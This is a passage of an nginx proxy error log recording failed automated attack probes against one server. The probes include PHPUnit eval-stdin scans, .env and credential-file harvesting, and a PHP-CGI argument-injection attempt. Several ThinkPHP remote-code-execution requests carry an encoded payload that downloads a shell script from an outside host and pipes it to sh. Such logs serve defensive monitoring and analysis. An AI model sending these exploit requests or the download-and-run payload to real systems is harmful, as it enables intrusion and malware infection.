/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 10:51:07 [error] 292#292: *28553 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 93.152.217.192, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 11:23:25 [error] 299#299: *29033 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 11:29:34 [error] 299#299: *29039 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 11:52:43 [error] 299#299: *29072 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 204.76.203.6, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 12:20:23 [error] 299#299: *29099 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 12:46:32 [error] 300#300: *29144 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 12:58:55 [error] 300#300: *29600 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 13:13:09 [error] 300#300: *30022 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 13:45:46 [error] 300#300: *30198 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 13:47:40 [error] 299#299: *31691 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 199.45.155.88, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/22 14:03:43 [error] 299#299: *31705 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 14:55:23 [error] 300#300: *31742 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 15:23:24 [error] 300#300: *31767 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 15:47:18 [error] 300#300: *31786 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:11:40 [error] 300#300: *31812 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:15:41 [error] 301#301: *31816 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/22 16:15:41 [error] 301#301: *31817 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/22 16:15:41 [error] 301#301: *31818 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.83.208" +2026/01/22 16:25:50 [error] 301#301: *31831 open() "/var/www/html/_next" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:25:50 [error] 301#301: *31832 open() "/var/www/html/api" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:25:50 [error] 301#301: *31833 open() "/var/www/html/_next/server" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /_next/server HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:25:51 [error] 301#301: *31834 open() "/var/www/html/app" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /app HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:25:51 [error] 301#301: *31835 open() "/var/www/html/api/route" failed (2: No such file or directory), client: 195.178.110.25, server: localhost-nginx-proxy-manager, request: "POST /api/route HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:40:03 [error] 302#302: *31847 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 16:58:51 [error] 310#310: *33353 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 17:31:51 [error] 308#308: *33387 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 17:31:53 [error] 308#308: *33388 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:54 [error] 308#308: *33389 open() "/var/www/html/core/.env.key" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /core/.env.key HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:54 [error] 308#308: *33390 open() "/var/www/html/data/env.json" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /data/env.json HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:54 [error] 308#308: *33391 open() "/var/www/html/core/.env.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /core/.env.log HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:55 [error] 308#308: *33392 open() "/var/www/html/core/.env.old" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /core/.env.old HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:55 [error] 308#308: *33393 open() "/var/www/html/core/.env.pem" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /core/.env.pem HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:55 [error] 308#308: *33394 open() "/var/www/html/dev/.env.smtp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /dev/.env.smtp HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:55 [error] 308#308: *33395 open() "/var/www/html/dev/.env.test" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /dev/.env.test HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:56 [error] 308#308: *33396 open() "/var/www/html/django/env.py" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /django/env.py HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:56 [error] 308#308: *33397 open() "/var/www/html/docs/.env.aws" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.aws HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:56 [error] 308#308: *33398 open() "/var/www/html/docs/.env.bak" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.bak HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:56 [error] 308#308: *33399 open() "/var/www/html/docs/.env.crt" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.crt HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:56 [error] 308#308: *33400 open() "/var/www/html/docs/.env.dev" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.dev HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:56 [error] 310#310: *33401 open() "/var/www/html/core/.env.tmp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /core/.env.tmp HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:57 [error] 310#310: *33402 open() "/var/www/html/docs/.env.gcp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.gcp HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:57 [error] 310#310: *33403 open() "/var/www/html/core/.env.uat" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /core/.env.uat HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:57 [error] 310#310: *33404 open() "/var/www/html/docs/.env.key" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.key HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:57 [error] 310#310: *33405 open() "/var/www/html/docs/.env.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.log HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:57 [error] 310#310: *33406 open() "/var/www/html/docs/.env.old" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.old HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:58 [error] 310#310: *33407 open() "/var/www/html/docs/.env.pem" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.pem HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:58 [error] 310#310: *33408 open() "/var/www/html/docs/.env.tmp" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.tmp HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:58 [error] 310#310: *33409 open() "/var/www/html/docs/.env.uat" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /docs/.env.uat HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:31:59 [error] 309#309: *34897 open() "/var/www/html/env/debug.txt" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /env/debug.txt HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:00 [error] 309#309: *34898 open() "/var/www/html/mail/.env.old" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /mail/.env.old HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:00 [error] 308#308: *34899 open() "/var/www/html/env/mail.conf" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /env/mail.conf HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:01 [error] 308#308: *34900 open() "/var/www/html/env/mail.yaml" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /env/mail.yaml HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:01 [error] 308#308: *34901 open() "/var/www/html/crm/.env.dist" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /crm/.env.dist HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:01 [error] 308#308: *34902 open() "/var/www/html/env/main.conf" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /env/main.conf HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:01 [error] 308#308: *34903 open() "/var/www/html/env/relay.bak" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /env/relay.bak HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:01 [error] 308#308: *34904 open() "/var/www/html/env/relay.log" failed (2: No such file or directory), client: 78.153.140.151, server: localhost-nginx-proxy-manager, request: "GET /env/relay.log HTTP/1.1", host: "91.82.83.208" +2026/01/22 17:32:32 [error] 308#308: *34906 open() "/var/www/html/wp-login.php" failed (2: No such file or directory), client: 130.12.181.143, server: localhost-nginx-proxy-manager, request: "GET /wp-login.php HTTP/1.1", host: "91.82.83.208" +2026/01/22 18:22:55 [error] 317#317: *35031 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 19:12:57 [error] 335#335: *35256 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 19:18:49 [error] 335#335: *35264 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 19:28:33 [error] 335#335: *35280 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/22 19:28:34 [error] 335#335: *35281 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/22 19:28:34 [error] 335#335: *35282 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.83.208" +2026/01/22 20:02:16 [error] 335#335: *35340 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 20:05:18 [error] 335#335: *35344 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 20:27:38 [error] 336#336: *35371 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208" +2026/01/22 20:27:38 [error] 336#336: *35372 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%7C%7Ccurl%20-s%20http%3A%2F%2F41.231.37.153%2Frondo.%5Cdtm.sh%3F%3D6f71068b%29%7Csh HTTP/1.1", host: "91.82.83.208" +2026/01/22 20:27:38 [error] 336#336: *35373 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 192.159.99.95, server: localhost-nginx-proxy-manager, request: "POST /index.php?s=captcha HTTP/1.1", host: "91.82.83.208" +2026/01/22 20:30:30 [error] 336#336: *35378 open() "/var/www/html/geoserver/wfs" failed (2: No such file or directory), client: 204.76.203.8, server: localhost-nginx-proxy-manager, request: "GET /geoserver/wfs?request=ListStoredQueries&service=wfs&version=2.0.0 HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 20:32:10 [error] 336#336: *35379 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "91.82.83.208" +2026/01/22 20:45:21 [error] 336#336: *35397 open() "/var/www/html/druid/index.html" failed (2: No such file or directory), client: 128.203.201.155, server: localhost-nginx-proxy-manager, request: "GET /druid/index.html HTTP/1.1", host: "91.82.83.208" +2026/01/22 20:52:11 [error] 336#336: *35406 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:31:50 [error] 235#235: *69 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:37 [error] 236#236: *81 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:38 [error] 236#236: *81 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:39 [error] 236#236: *81 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:39 [error] 236#236: *81 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:40 [error] 236#236: *81 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:40 [error] 236#236: *81 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:40 [error] 236#236: *81 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:40 [error] 236#236: *81 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:41 [error] 236#236: *81 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:41 [error] 236#236: *81 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:42 [error] 236#236: *81 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:42 [error] 236#236: *81 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:42 [error] 236#236: *81 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:42 [error] 236#236: *81 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:43 [error] 236#236: *81 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:44 [error] 236#236: *81 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:44 [error] 236#236: *81 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:45 [error] 236#236: *81 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:46 [error] 236#236: *81 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:46 [error] 236#236: *81 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:47 [error] 236#236: *81 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:48 [error] 236#236: *81 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:48 [error] 236#236: *81 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:49 [error] 236#236: *81 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:50 [error] 236#236: *81 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:51 [error] 236#236: *81 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.61.134.40, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/22 22:38:52 [error] 